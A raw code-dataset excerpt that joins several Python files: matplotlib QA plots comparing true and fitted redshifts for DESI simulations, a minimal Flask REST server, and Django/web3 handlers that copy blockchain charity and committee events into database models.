xmin,xmax=np.min(xval),np.max(xval)\n # Labels\n ax.set_xlabel(lbl)\n ax.set_ylabel(ylbl)\n ax.set_xlim(xmin,xmax)\n v_ylim = ylim * 3e5 # redshift to km/s\n ax.set_ylim(-v_ylim+yoff, v_ylim+yoff)\n\n # Points\n ax.plot([xmin,xmax], [0.,0], '--', color='gray')\n #ax.scatter(xval, yval, marker='o', s=1, label=objtype,\n # color=sty_otype[objtype]['color'])\n cm = plt.get_cmap(sty_otype[objtype]['pcolor'])\n if objtype == 'ELG':\n xbins = 10**np.linspace(np.log10(xmin), np.log10(xmax), 20)\n else:\n xbins = np.linspace(xmin, xmax, 20)\n ybins = np.linspace(-v_ylim+yoff, v_ylim+yoff, 40) # km/s\n #import pdb; pdb.set_trace()\n counts, xedges, yedges = np.histogram2d(xval, yval * 3e5, bins=(xbins, ybins))\n max_c = np.max(counts)\n #if kk == 3:\n ax.pcolormesh(xedges, yedges, counts.transpose(), cmap=cm, vmin=0, vmax=max_c/5.)\n\n #ax.hist2d(xval, yval, bins=20, cmap=cm)\n #ax.scatter(xval, yval, marker='o', s=1, label=objtype,\n # color=sty_otype[objtype]['color'])\n\n # Finish\n plt.tight_layout(pad=0.2,h_pad=0.2,w_pad=0.3)\n plt.subplots_adjust(top=0.92)\n if outfile is not None:\n plt.savefig(outfile, dpi=700)\n plt.close()\n print(\"Wrote {:s}\".format(outfile))\n\n\ndef summ_fig(simz_tab, summ_tab, meta, outfile=None):\n \"\"\"Generate summary summ_fig\n :param simz_tab:\n :param summ_tab:\n :param meta:\n :param outfile:\n :return:\n \"\"\"\n # Plot\n sty_otype = get_sty_otype()\n fig = plt.figure(figsize=(8, 5.0))\n gs = gridspec.GridSpec(3,2)\n\n # RedMonster objects\n zobj_tab = slice_simz(simz_tab,redm=True)\n otypes = ['ELG','LRG','QSO_L','QSO_T']\n\n # z vs. z plot\n jj=0\n ax= plt.subplot(gs[0:2,jj])\n\n # Catastrophic\n cat_tab = slice_simz(simz_tab,survey=True, catastrophic=True)\n ax.scatter(cat_tab['TRUEZ'], cat_tab['Z'],\n marker='x', s=9, label='CAT', color='red')\n\n notype = []\n for otype in otypes:\n gd_o = np.where(zobj_tab['TEMPLATETYPE']==otype)[0]\n notype.append(len(gd_o))\n ax.scatter(zobj_tab['TRUEZ'][gd_o], zobj_tab['Z'][gd_o],\n marker='o', s=1, label=sty_otype[otype]['lbl'], color=sty_otype[otype]['color'])\n ax.set_ylabel(r'$z_{\\rm red}$')\n ax.set_xlabel(r'$z_{\\rm true}$')\n ax.set_xlim(-0.1, 1.02*np.max(np.array([np.max(zobj_tab['TRUEZ']),\n np.max(zobj_tab['Z'])])))\n ax.set_ylim(-0.1, np.max(np.array([np.max(zobj_tab['TRUEZ']),\n np.max(zobj_tab['Z'])])))\n # Legend\n legend = ax.legend(loc='upper left', borderpad=0.3,\n handletextpad=0.3, fontsize='small')\n\n # Zoom\n jj=1\n ax= plt.subplot(gs[0:2,jj])\n\n for otype in otypes:\n # Grab\n gd_o = np.where(zobj_tab['TEMPLATETYPE']==otype)[0]\n # Stat\n dz = calc_dz(zobj_tab[gd_o])\n ax.scatter(zobj_tab['TRUEZ'][gd_o], dz, marker='o',\n s=1, label=sty_otype[otype]['lbl'], color=sty_otype[otype]['color'])\n\n #ax.set_xlim(xmin, xmax)\n ax.set_ylabel(r'$(z_{\\rm red}-z_{\\rm true}) / (1+z)$')\n ax.set_xlabel(r'$z_{\\rm true}$')\n ax.set_xlim(0.,4)\n deltaz = 0.002\n ax.set_ylim(-deltaz/2,deltaz)\n\n # Legend\n legend = ax.legend(loc='lower right', borderpad=0.3,\n handletextpad=0.3, fontsize='small')\n\n # Meta text\n ax= plt.subplot(gs[2,0])\n ax.set_axis_off()\n # Meta\n xlbl = 0.1\n ylbl = 0.85\n ax.text(xlbl, ylbl, 'SPECPROD: {:s}'.format(meta['SPECPROD']), transform=ax.transAxes, ha='left')\n yoff=0.15\n for key in meta:\n if key == 'SPECPROD':\n continue\n ylbl -= yoff\n ax.text(xlbl+0.1, ylbl, key+': {:s}'.format(meta[key]),\n transform=ax.transAxes, ha='left', fontsize='small')\n\n # Target stats\n ax= plt.subplot(gs[2,1])\n ax.set_axis_off()\n xlbl = 0.1\n ylbl = 0.85\n ax.text(xlbl, ylbl, 'Targets', transform=ax.transAxes, ha='left')\n yoff=0.15\n for jj,otype in enumerate(otypes):\n ylbl -= yoff\n gd_o = simz_tab['TEMPLATETYPE']==otype\n ax.text(xlbl+0.1, ylbl, sty_otype[otype]['lbl']+': {:d} ({:d})'.format(np.sum(gd_o),notype[jj]),\n transform=ax.transAxes, ha='left', fontsize='small')\n\n # Finish\n plt.tight_layout(pad=0.1,h_pad=0.0,w_pad=0.1)\n if outfile is not None:\n plt.savefig(outfile, dpi=700)\n plt.close()\n\n\n\ndef summ_stats(simz_tab, outfil=None):\n '''Generate summary stats\n\n Parameters\n ----------\n simz_tab : Table\n Table summarizing redshifts\n\n Returns\n -------\n list\n List of summary stat dicts\n '''\n otypes = ['ELG','LRG', 'QSO_L', 'QSO_T', 'BGS', 'MWS'] # WILL HAVE TO DEAL WITH QSO_TRACER vs QSO_LYA\n summ_dict = {}\n\n rows = []\n for otype in otypes:\n # Calculate stats\n stat_dict = calc_stats(simz_tab, otype)\n summ_dict[otype] = stat_dict\n # Check requirements\n summ_dict[otype]['REQ_INDIV'], passf = obj_requirements(stat_dict,otype)\n summ_dict[otype]['REQ_FINAL'] = passf\n\n # Generate Table\n #stat_tab = Table(rows=rows)\n\n # Return\n return summ_dict\n #return stat_tab\n\n\ndef plot_slices(x, y, ok, bad, x_lo, x_hi, y_cut, num_slices=5, min_count=100,\n axis=None):\n \"\"\"Scatter plot with 68, 95 percentiles superimposed in slices.\n\n Requires that the matplotlib package is installed.\n\n Parameters\n ----------\n x : array of float\n X-coordinates to scatter plot. Points outside [ `x_lo`, `x_hi` ] are\n not displayed.\n y : array of float\n Y-coordinates to scatter plot. Y values are assumed to be roughly\n symmetric about zero.\n ok : array of bool\n Array of booleans that identify which fits are considered good.\n bad : array of bool\n Array of booleans that identify which fits have failed catastrophically.\n x_lo : float\n Minimum value of `x` to plot.\n x_hi : float\n Maximum value of `x` to plot.\n y_cut : float\n The target maximum value of :math:`|y|`. A dashed line at this value is\n added to the plot, and the vertical axis is clipped at\n :math:`|y| = 1.25 \\times y_{cut}` (but values outside this range are included in\n the percentile statistics).\n num_slices : int\n Number of equally spaced slices to divide the interval [ `x_lo`, `x_hi` ]\n into.\n min_count : int\n Do not use slices with fewer points for superimposed percentile\n statistics.\n axis : matplotlib axis object or None\n Uses the current axis if this is None.\n \"\"\"\n #import matplotlib.pyplot as plt\n log = get_logger()\n\n if axis is None:\n axis = plt.gca()\n\n x_bins = np.linspace(x_lo, x_hi, num_slices + 1)\n x_i = np.digitize(x, x_bins) - 1\n limits = []\n counts = []\n for s in range(num_slices):\n # Calculate percentile statistics for ok fits.\n y_slice = y[ok & (x_i == s)]\n counts.append(len(y_slice))\n if counts[-1] > 0:\n limits.append(np.percentile(y_slice, (2.5, 16, 50, 84, 97.5)))\n else:\n limits.append((0., 0., 0., 0., 0.))\n limits = np.array(limits)\n counts = np.array(counts)\n\n # Plot scatter of all fits.\n axis.scatter(x[ok], y[ok], s=15, marker='.', lw=0, color='b', alpha=0.5)\n axis.scatter(x[~ok], y[~ok], s=15, marker='x', lw=0, color='k', alpha=0.5)\n\n # Plot quantiles in slices with enough fits.\n stepify = lambda y: np.vstack([y, y]).transpose().flatten()\n y_m2 = stepify(limits[:, 0])\n y_m1 = stepify(limits[:, 1])\n y_med = stepify(limits[:, 2])\n y_p1 = stepify(limits[:, 3])\n y_p2 = stepify(limits[:, 4])\n xstack = stepify(x_bins)[1:-1]\n for i in range(num_slices):\n s = slice(2 * i, 2 * i + 2)\n if counts[i] >= min_count:\n axis.fill_between(\n xstack[s], y_m2[s], y_p2[s], alpha=0.15, color='red')\n axis.fill_between(\n xstack[s], y_m1[s], y_p1[s], alpha=0.25, color='red')\n axis.plot(xstack[s], y_med[s], 'r-', lw=2.)\n\n # Plot cut lines.\n axis.axhline(+y_cut, ls=':', color='k')\n axis.axhline(0., ls='-', color='k')\n axis.axhline(-y_cut, ls=':', color='k')\n\n # Plot histograms of of not ok and catastrophic fits.\n rhs = axis.twinx()\n\n weights = np.ones_like(x[bad]) / len(x[ok])\n if len(weights) > 0:\n try:\n rhs.hist(\n x[bad], range=(x_lo, x_hi), bins=num_slices, histtype='step',\n weights=weights, color='k', cumulative=True)\n except UnboundLocalError:\n log.warning('All values lie outside the plot range')\n\n weights = np.ones_like(x[~ok]) / len(x)\n if len(weights) > 0:\n try:\n rhs.hist(\n x[~ok], range=(x_lo, x_hi), bins=num_slices, histtype='step',\n weights=weights, color='k', ls='dashed', cumulative=True)\n except UnboundLocalError:\n log.warning('All values lie outside the plot range')\n\n axis.set_ylim(-1.25 * y_cut, +1.25 * y_cut)\n axis.set_xlim(x_lo, x_hi)\n\n return axis, rhs\n\n\ndef dz_summ(simz_tab, outfile=None, pdict=None, min_count=20):\n \"\"\"Generate a summary figure comparing zfind to ztruth.\n\n Parameters\n ----------\n simz_tab : Table\n Table of redshift information.\n pp : PdfPages object\n This parameter is not documented.\n pdict : dict\n Guides the plotting parameters\n min_count : int, optional\n This parameter is not documented.\n \"\"\"\n log = get_logger()\n\n # INIT\n nrows = 2\n objtype = ['ELG', 'LRG', 'QSO_T', 'QSO_L']\n fluxes = ['OIIFLUX','ZMAG','GMAG','GMAG']\n ncols = len(objtype)\n #title = r'$\\Delta v$ vs. z'\n\n # Plotting dicts\n if pdict is None:\n pdict = dict(ELG={'TRUEZ': { 'n': 15, 'min': 0.6, 'max': 1.6, 'label': 'redshift', 'overlap': 1 },\n 'RMAG': {'n': 12, 'min': 21.0, 'max': 23.4, 'label': 'r-band magnitude', 'overlap': 0},\n 'OIIFLUX': {'n': 10, 'min': 0.0, 'max': 5.0e-16, 'label': '[OII] flux', 'overlap': 2}},\n LRG={'TRUEZ': {'n': 12, 'min': 0.5, 'max': 1.0, 'label': 'redshift', 'overlap': 2 },\n 'ZMAG': {'n': 15, 'min': 19.0, 'max': 21.0, 'label': 'z-band magnitude', 'overlap': 1 }},\n QSO_T={'TRUEZ': {'n': 12, 'min': 0.5, 'max': 2.1, 'label': 'redshift', 'overlap': 1 },\n 'GMAG': {'n': 15, 'min': 19.0, 'max': 24.0, 'label': 'g-band magnitude', 'overlap': 1 }},\n QSO_L={'TRUEZ': {'n': 12, 'min': 2.1, 'max': 4.0, 'label': 'redshift', 'overlap': 1 },\n 'GMAG': {'n': 15, 'min': 19.0, 'max': 24.0, 'label': 'g-band magnitude', 'overlap': 1 }},\n )\n\n # Initialize a new page of plots.\n plt.clf()\n figure, axes = plt.subplots(\n nrows, ncols, figsize=(11, 8.5), facecolor='white',\n sharey=True)\n #figure.suptitle(title)\n\n # True Redshift\n row = 0\n ptype = 'TRUEZ'\n for row in range(nrows):\n for i,otype in enumerate(objtype):\n if row == 0:\n ptype = 'TRUEZ'\n else:\n ptype = fluxes[i]\n\n # Grab the set of measurements\n survey = slice_simz(simz_tab, objtype=otype, redm=True, survey=True)\n\n # Simple stats\n ok = survey['ZWARN'] == 0\n dv = calc_dz(survey)*3e5 # dz/1+z\n bad = dv > catastrophic_dv(otype)\n #if i==2:\n # pdb.set_trace()\n\n # Plot the truth distribution for this variable.\n if ptype == 'TRUEZ':\n x = survey['TRUEZ']\n elif ptype == 'OIIFLUX':\n x = survey['OIIFLUX']\n else:\n log.warning('Assuming hardcoded filter order')\n if ptype == 'GMAG':\n x = survey['MAG'][:,0]\n elif ptype == 'RMAG':\n x = survey['MAG'][:,1]\n elif ptype == 'ZMAG':\n x = survey['MAG'][:,2]\n else:\n raise ValueError('unknown ptype {}'.format(ptype))\n\n nslice, x_min, x_max = pdict[otype][ptype]['n'], pdict[otype][ptype]['min'], pdict[otype][ptype]['max']\n rhs = None\n max_dv = 1000.\n max_frac = 0.1\n overlap = pdict[otype][ptype]['overlap']\n\n # axis\n col = i\n axis = axes[row][col]\n\n #if (row==1) & (col==1):\n #pdb.set_trace()\n\n if len(survey) < 100:\n log.warning(\"Insufficient objects of type {:s}. Skipping slice QA\".format(otype))\n continue\n lhs, rhs = plot_slices(\n x=x, y=dv, ok=ok, bad=bad, x_lo=x_min, x_hi=x_max,\n num_slices=nslice, y_cut=max_dv, axis=axis, min_count=min_count)\n # Add a label even if the fitter has no results.\n xy = (0.5, 0.98)\n coords = 'axes fraction'\n axis.annotate(\n otype, xy=xy, xytext=xy, xycoords=coords,\n textcoords=coords, horizontalalignment='center',\n verticalalignment='top', size='large', weight='bold')\n\n rhs.set_ylim(0., max_frac)\n if col < ncols - 1:\n plt.setp([rhs.get_yticklabels()], visible=False)\n else:\n # Hide the last y-axis label except on the first row.\n if row > 0:\n plt.setp([rhs.get_yticklabels()[-2:]], visible=False)\n rhs.set_ylabel('zwarn, catastrophic cummulative fraction')\n\n if col > 0:\n plt.setp([axis.get_yticklabels()], visible=False)\n else:\n axis.set_ylabel('Redshift fit residual $\\Delta v$ [km/s]')\n\n #if row < nrows - 1:\n # plt.setp([axis.get_xticklabels()], visible=False)\n #else:\n axis.set_xlabel('{0} {1}'.format(otype, ptype))\n axis.set_xlim(x_min, x_max)\n\n # Hide overlapping x-axis labels except in the bottom right.\n if overlap and (col < ncols - 1):\n axis.set_xticks(axis.get_xticks()[0:-overlap])\n\n figure.subplots_adjust(\n left=0.1, bottom=0.07, right=0.9, top=0.95,\n hspace=0.2, wspace=0.05)\n\n if outfile is not None:\n plt.savefig(outfile, dpi=700)\n plt.close()\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"desihub/desisim/py/desisim/spec_qa/redshifts.py","file_name":"redshifts.py","file_ext":"py","file_size_in_byte":31041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34782900661","text":"from flask_restful import Resource, Api\nfrom flask_jsonpify import jsonify, jsonpify\nfrom flask_cors import CORS\nfrom flask import Flask, request\nimport json\n\n########### CONFIG ###########\nhost = '127.0.0.1'\nport = '12345'\ndebug = True\ndata_path = '../data/'\nsend_on_exception = True\n\n# flask setup\napp = Flask(__name__)\napi = Api(app)\nCORS(app)\n\n\n@app.route('/', methods=('get', 'post'))\ndef rest():\n # parse JSON args\n try:\n args = json.loads(request.args['args'])\n if show_request_args:\n print('\\nRequest arguments:')\n print(json.dumps(args, sort_keys=False, indent=4))\n\n action = args['action']\n\n return jsonify({\n 'type': 'error',\n 'msg': 'Missing arguments or invalid action!'\n })\n\n except Exception as e:\n print(e)\n if send_on_exception:\n return jsonify({\n 'type': 'error',\n 'msg': str(e.args[0])\n })\n else:\n raise\n\n\n# start server when program starts\nif __name__ == '__main__':\n print(f'Server is running at http://{host}:{port}/\\n')\n if not debug:\n print(\n 'Debug mode is disabled, server will not detect changes in code.')\n app.run(host=host, port=port, debug=debug)\n","repo_name":"visvar/rhythm-vis","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26666889","text":"from web3 import Web3\nfrom web3.middleware import geth_poa_middleware\nfrom contract_parser.models import *\nfrom user_profile.models import *\nfrom .models import *\nfrom django.utils import timezone\nfrom .contract_enums import *\nfrom decimal import Decimal\nimport datetime\n\n\ndef handle_applied_as_validator_event():\n contract_obj = Contract.objects.get(contract_name=\"Validator\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n applied_as_validator_events = contract.events.AppliedAsValidator().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in applied_as_validator_events:\n\n applicant_address = event['args']['applicant']\n ipfs_hash = event['args']['_ipfsHash']\n committee_id = event['args']['committeeId']\n status = event['args']['status']\n\n # Fetch or create the user profile\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=applicant_address)\n\n # Create or update the validator request\n ValidatorRequest.objects.update_or_create(\n applicant=user_profile,\n defaults={\n 'ipfs_hash': ipfs_hash,\n 'validation_status': status,\n 'committee_id': committee_id\n }\n )\n\n\ndef handle_validator_request_responded_event():\n contract_obj = Contract.objects.get(contract_name=\"Validator\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n validator_request_responded_events = contract.events.ValidatorRequestResponded().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in validator_request_responded_events:\n applicant_address = event['args']['applicant']\n status = event['args']['status']\n\n # Fetch the user profile\n user_profile = UserProfile.objects.get(wallet_address=applicant_address)\n\n # Update the validator request status\n validator_request = ValidatorRequest.objects.get(applicant=user_profile)\n validator_request.validation_status = status\n validator_request.save()\n\n\ndef handle_final_decision_event():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n final_decision_events = contract.events.FinalDecision().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n print(f\"Final Decision logs: {final_decision_events}\")\n for event in final_decision_events:\n committee_id = event['args']['committeeId']\n decision = event['args']['finalDecision']\n\n committee_instance = Committee.objects.get(committee_id=committee_id)\n committee_instance.final_decision = decision\n\n committee_instance.save()\n\n\ndef handle_decision_recorded_event():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n decision_recorded_events = contract.events.DecisionRecorded().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in decision_recorded_events:\n committee_id = event['args']['committeeId']\n member = event['args']['member']\n decision = event['args']['decision']\n feedback = event['args']['feedback']\n\n member_profile, _ = UserProfile.objects.get_or_create(wallet_address=member)\n committee_instance = Committee.objects.get(committee_id=committee_id)\n\n committee_membership = CommitteeMembership.objects.get(committee=committee_instance, member=member_profile)\n\n if not committee_membership.has_voted:\n committee_membership.has_voted = True\n committee_membership.decision = decision\n committee_membership.feedback = feedback\n committee_membership.save()\n\n if decision:\n committee_instance.yes_votes += 1\n else:\n committee_instance.no_votes += 1\n committee_instance.save()\n\n\ndef handle_chosen_as_committee_member():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n chosen_member_events = contract.events.ChosenAsCommitteeMember().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in chosen_member_events:\n committee_id = event['args']['newCommitteeId']\n committee_type_id = event['args']['_committeeTypeId']\n milestone_index = event['args']['_milestoneIndex']\n committee_type = CommitteeType(\n event['args']['_committeeType']).name # Assuming CommitteeType is an Enum in your Django code\n member_address = event['args']['member']\n\n # Fetch the committee instance\n committee_instance, _ = Committee.objects.get_or_create(committee_id=committee_id)\n\n # Logic to add/update each member's detailed information\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=member_address)\n committee_member, _ = CommitteeMembership.objects.get_or_create(member=user_profile, committee=committee_instance)\n committee_member.committee_type = committee_type\n committee_member.committee_type_id = committee_type_id\n committee_member.milestone_index = milestone_index\n committee_member.save()\n\n # Add the member to the committee if not already added\n if committee_member not in committee_instance.members.all():\n committee_instance.members.add(committee_member.member)\n\n # Update the last processed block\n contract_obj.save()\n\n\ndef handle_committee_formed():\n contract_obj = Contract.objects.get(contract_name=\"RandomizedCommittee\")\n\n # Set up web3 and contract\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n committee_formed_events = contract.events.CommitteeFormed().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in committee_formed_events:\n committee_id = event['args']['committeeId']\n members = event['args']['members']\n committee_type_id = event['args']['_committeeTypeId']\n milestone_index = event['args']['_milestoneIndex']\n committee_type = CommitteeType(\n event['args']['_committeeType']).name\n\n committee_instance, created = Committee.objects.get_or_create(\n committee_id=committee_id,\n defaults={\n 'final_decision': None, # or set a default if needed\n 'total_members': len(members),\n 'committee_type': committee_type,\n 'committee_type_id': committee_type_id,\n 'milestone_index': milestone_index\n }\n )\n\n if created:\n # Assuming you have a related model for members (e.g., CommitteeMember)\n for member_address in members:\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=member_address)\n committee_member, _ = CommitteeMembership.objects.get_or_create(member=user_profile, committee=committee_instance)\n committee_instance.members.add(user_profile)\n\n committee_instance.save()\n\n contract_obj.save()\n\n\ndef update_proposal_status():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n # Fetch the ProposalStatusUpdated events\n proposal_status_updated_events = contract.events.ProposalStatusUpdated().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in proposal_status_updated_events:\n event_id = event['args']['eventId']\n status = EventMilestoneStatus(event['args']['status']).name # Convert to string representation\n\n # Update the event in the database\n try:\n charity_event = Event.objects.get(id=event_id)\n charity_event.status = status\n charity_event.save()\n\n except Event.DoesNotExist:\n print(\"Event don't exist: \", event_id)\n pass\n\n\ndef convert_timestamp_to_datetime(endDate):\n # If the timestamp is larger than a certain threshold (e.g., year 3000 in seconds),\n # assume it's in milliseconds and divide by 1000\n if endDate > 32503680000:\n endDate /= 1000\n return timezone.datetime.fromtimestamp(endDate, tz=timezone.utc)\n\n\ndef get_proposals():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n propasal_creation_event = contract.events.ProposalCreated().get_logs(fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in propasal_creation_event:\n event_id = event['args']['eventId']\n creator = event['args']['creator']\n event_name = event['args']['name']\n event_description = event['args']['description']\n target_amount = Decimal(event['args']['targetAmount'])\n collected_amount = Decimal(event['args']['collectedAmount'])\n endDate = event['args']['endDate']\n category = event['args']['category']\n committeeId = event['args']['committeeId']\n isFundraisingOver = event['args']['isFundraisingOver']\n block_number = event['blockNumber']\n timestamp = web3.eth.get_block(block_number)[\"timestamp\"]\n tokenUri = contract.functions.tokenURI(event_id).call()\n\n # Now Save it\n user_profile, _ = UserProfile.objects.get_or_create(wallet_address=creator)\n\n created_at = timezone.datetime.fromtimestamp(timestamp, tz=timezone.utc)\n event_date = convert_timestamp_to_datetime(endDate)\n print(f\"End Date Datetime: {event_date}\")\n try:\n event_instance, created = Event.objects.get_or_create(\n id=event_id,\n defaults={\n 'creator': user_profile,\n 'name': event_name,\n 'description': event_description,\n 'target_amount': target_amount,\n 'collected_amount': collected_amount,\n 'end_date': event_date,\n 'created_at': created_at,\n 'category': EventCategory(category).name,\n 'status': EventMilestoneStatus(0).name,\n 'rating_sum': 0,\n 'rating_count': 0,\n 'committee_id': committeeId,\n 'is_fundraising_over': isFundraisingOver,\n 'token_uri': tokenUri\n }\n )\n event_instance.save()\n\n except Exception as e:\n print(f\"EXCEPTION: {e}\")\n\n\ndef update_milestone_data():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n # Fetch the MilestoneMarkedAsCompleted events\n milestone_completed_events = contract.events.MilestoneMarkedAsCompleted().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in milestone_completed_events:\n event_id = event['args']['eventId']\n milestone_index = event['args']['milestoneIndex']\n spended_amount = Decimal(event['args']['spendedAmount'])\n\n # Update the milestone in the database\n try:\n charity_event = Event.objects.get(id=event_id)\n milestone = Milestone.objects.get(event=charity_event, milestone_index=milestone_index)\n milestone.spended_amount = spended_amount\n milestone.completed = True\n milestone.save()\n\n except (Event.DoesNotExist, IndexError):\n print(f\"Event with ID {event_id} doesn't exist or milestone index {milestone_index} is out of range.\")\n pass\n\n\ndef update_milestone_status():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n # Fetch the MilestoneStatusUpdated events\n milestone_status_updated_events = contract.events.MilestoneStatusUpdated().get_logs(\n fromBlock=contract_obj.last_processed_event_block,\n toBlock=\"latest\"\n )\n\n for event in milestone_status_updated_events:\n event_id = event['args']['eventId']\n milestone_index = event['args']['milestoneIndex']\n decision = event['args']['decision']\n is_completed = event['args']['_iscomplited']\n\n # Determine the status based on the decision and is_completed values\n if is_completed:\n status = EventMilestoneStatus.Approved.name if decision else EventMilestoneStatus.Rejected.name\n else:\n status = EventMilestoneStatus.Pending.name\n\n # Update the milestone in the database\n try:\n charity_event = Event.objects.get(id=event_id)\n milestone = Milestone.objects.get(event=charity_event, milestone_index=milestone_index)\n milestone.status = status\n milestone.completed = is_completed\n milestone.save()\n\n except (Event.DoesNotExist, IndexError):\n print(f\"Event with ID {event_id} doesn't exist or milestone index {milestone_index} is out of range.\")\n pass\n\n\ndef get_milestones():\n contract_obj = Contract.objects.get(contract_name=\"CharityEvent\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n milestone_creation_event = contract.events.MilestoneCreated().get_logs(fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in milestone_creation_event:\n event_id = event['args']['eventId']\n milestone_index = event['args']['milestoneIndex']\n milestone_name = event['args']['milestoneName']\n description = event['args']['description']\n target_amount = Decimal(event['args']['targetAmount'])\n endDate = event['args']['endDate']\n status = EventMilestoneStatus(event['args']['status']).name\n block_number = event['blockNumber']\n timestamp = web3.eth.get_block(block_number)[\"timestamp\"]\n\n # Convert the timestamp to a Django datetime object\n end_date = convert_timestamp_to_datetime(endDate)\n created_at = timezone.datetime.fromtimestamp(timestamp, tz=timezone.utc)\n\n # Fetch the associated event and creator\n try:\n associated_event = Event.objects.get(id=event_id)\n creator_profile = UserProfile.objects.get(wallet_address=associated_event.creator.wallet_address)\n except (Event.DoesNotExist, UserProfile.DoesNotExist):\n # Handle the case where the associated event or user does not exist in the database\n # This might be an error or you might want to create a new event or user\n continue\n\n # Save the milestone to the database\n milestone_instance, _ = Milestone.objects.get_or_create(\n event=associated_event,\n name=milestone_name,\n milestone_index=milestone_index,\n defaults={\n 'creator': creator_profile,\n 'description': description,\n 'spended_amount': 0, # Assuming the spended amount starts at 0\n 'target_amount': target_amount,\n 'end_date': end_date,\n 'created_at': created_at,\n 'rating_sum': 0,\n 'rating_count': 0,\n 'committee_id': 0, # Assuming no committee is assigned initially\n 'completed': False,\n 'is_fund_released': False,\n 'status': status\n }\n )\n\n contract_obj.save()\n\n\ndef handle_donated_to_event_event():\n contract_obj = Contract.objects.get(contract_name=\"Fundraising\")\n address = contract_obj.address\n abi = contract_obj.abi\n provider_url = contract_obj.network.rpc_endpoint\n\n web3 = Web3(Web3.HTTPProvider(provider_url))\n web3.middleware_onion.inject(geth_poa_middleware, layer=0)\n contract = web3.eth.contract(address=address, abi=abi)\n\n donated_to_event_events = contract.events.DonatedToEvent().get_logs(\n fromBlock=contract_obj.last_processed_event_block, toBlock=\"latest\")\n\n for event in donated_to_event_events:\n try:\n donor_address = event['args']['donor']\n amount = Decimal(event['args']['amount'])\n event_id = event['args']['eventId']\n message = event['args']['message']\n block_number = event['blockNumber']\n timestamp = 